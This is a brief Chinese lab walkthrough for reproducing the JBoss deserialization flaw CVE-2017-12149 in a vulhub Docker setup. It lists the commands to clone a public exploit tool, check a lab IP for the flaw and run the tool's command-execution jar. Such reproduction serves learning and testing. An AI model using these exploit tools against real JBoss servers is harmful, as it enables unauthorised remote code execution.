JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
环境启动
vulhub进入vulhub/jboss/CVE-2017-12149启动,需要等2分钟左右
docker-compose up -d
访问本机ip的8080端口
漏洞复现
使用工具检测发现存在CVE-2017-12149
工具下载地址:https://github.com/yunxu1/jboss-_CVE-2017-12149
git clone https://github.com/yunxu1/jboss-_CVE-2017-12149.git
下载好之后给上执行权限
chmod 777 脚本名
检测漏洞
java -jar verify_CVE-2017-12149.jar http://192.168.8.143:8080
存在漏洞
执行命令
java -jar jboss反序列化_CVE-2017-12149.jar http://192.168.8.143:8080